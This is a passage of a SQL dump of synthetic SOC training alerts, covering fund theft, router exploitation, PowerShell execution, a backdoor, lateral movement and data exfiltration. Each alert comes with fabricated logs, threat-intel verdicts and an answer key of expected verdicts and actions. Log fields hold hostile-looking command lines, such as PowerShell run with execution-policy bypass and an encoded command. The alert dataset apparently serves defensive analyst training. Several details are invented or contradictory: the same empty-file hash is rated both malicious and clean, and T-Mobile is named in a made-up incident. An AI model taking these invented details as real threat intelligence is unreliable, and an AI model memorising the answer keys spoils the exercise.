1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 
100\"}}', 0),
(1008, 'Unexpected Return of Funds and Dialogue Initiated', 'medium', 'Communication Channels', 'In an unexpected turn, the attacker returned the stolen funds and initiated a dialogue with the victim. The conversation raised questions about the motives and ethical considerations behind the attack.', 'Unusual Behavior', 'T1589 - Engage in Dialogue', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:45:00Z\",\"event_id\":\"evt123456\",\"source_ip\":\"173.194.55.0\",\"destination_ip\":\"10.0.0.5\",\"username\":\"john.doe\",\"email\":\"attacker@example.com\",\"subject\":\"Returning Your Funds\",\"message_body\":\"We have decided to return the funds. Let\'s talk about potential collaboration.\",\"file_name\":\"refund_transaction.txt\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"transaction_id\":\"txn098765\",\"amount_returned\":5000,\"currency\":\"USD\"}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"173.194.55.0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email associated with previous phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No associated malware 
found.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. 
Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. 
Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1009, 'Unprotected Router Exploitation Detected', 'high', 'Network Traffic Analysis', 'An attacker exploited a known vulnerability in T-Mobile\'s infrastructure, gaining initial access through an unprotected router.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"network_connection_attempt\",\"source_ip\":\"203.0.113.25\",\"destination_ip\":\"10.0.0.5\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"http_method\":\"GET\",\"url\":\"http://10.0.0.5/cgi-bin/login\",\"user_agent\":\"Mozilla/5.0 (compatible; RouterExploit/1.0)\",\"filename\":\"exploit_script.sh\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"admin\",\"http_headers\":{\"Host\":\"10.0.0.5\",\"Connection\":\"keep-alive\"}}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple attacks on network infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"T-Mobile\'s internal router.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known exploit script hash.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used for exploiting router vulnerabilities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1010, 'Malicious Script Execution Identified', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script was executed on the host machine to establish persistence and escalate privileges. The script was initiated by the user \'jbinns\' from an external IP address known for malicious activities.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:05Z\",\"event_type\":\"Execution\",\"host_ip\":\"192.168.1.101\",\"user\":\"jbinns\",\"process_name\":\"cmd.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Windows\\\\Temp\\\\exploit.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.101\",\"filename\":\"exploit.ps1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"event_id\":\"4624\",\"logon_type\":3}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with recent APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious PowerShell script\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used for privilege escalation\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jbinns\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account associated with unusual 
activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1011, 'Persistence Mechanism Established', 'high', 'System Logs', 'A hidden backdoor was established on host 192.168.1.45 allowing ongoing unauthorized access. The backdoor was introduced by executing a malicious executable \'svchostx.exe\' linked to the attacker IP 203.0.113.45.', 'Persistence', 'T1055.001 - Process Injection', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:30Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.45\",\"process_name\":\"svchostx.exe\",\"process_id\":4321,\"parent_process\":\"explorer.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"user\":\"Binns\",\"attacker_ip\":\"203.0.113.45\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\svchostx.exe\",\"network_activity\":[{\"destination_ip\":\"203.0.113.45\",\"port\":443}]}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feeds\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"svchostx.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious file mimicking legitimate Windows process.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matched known malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"},{\"timestamp\":\"2026-02-01T20:31:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"},{\"timestamp\":\"2026-02-01T20:30:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"},{\"timestamp\":\"2026-02-01T20:29:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"},{\"timestamp\":\"2026-02-01T20:28:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1012, 'Lateral Movement Detected Across Network', 'high', 'Network Monitoring Tools', 'Anomalous lateral movement detected on the network. User \'jbinns\' accessed multiple hosts in search of sensitive databases. Network monitoring tools identified suspicious access patterns originating from an internal IP linked to potential data exfiltration activities.', 'Lateral Movement', 'T1071 - Application Layer Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T15:23:45Z\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.22\",\"user\":\"jbinns\",\"action\":\"network_access\",\"protocol\":\"SMB\",\"file_accessed\":\"\\\\\\\\192.168.1.22\\\\sensitive_data\\\\customer_info.db\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"external_ip\":\"203.0.113.45\",\"alert_id\":\"ALRT-2098\",\"description\":\"User \'jbinns\' accessed a host using SMB protocol and attempted to access a database containing customer information.\"}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP used by user \'jbinns\' for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to previous APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jbinns\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1013, 'Massive Data Exfiltration Alert', 'critical', 'Data Loss Prevention (DLP) System', 'In the final phase of a coordinated exfiltration operation, 54 million customer records were extracted and sent to an external IP. The data is expected to be sold on underground forums. Immediate action is required to prevent further data loss.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"event\":\"Data Exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"filename\":\"customer_data_2023.zip\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john.doe\",\"action\":\"transferred\",\"bytes_transferred\":54000000,\"alert_id\":\"DLP-EXFIL-001\",\"status\":\"Confirmed\"}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with recent exfiltration operations.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"clean\",\"details\":\"Employee in good standing.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data 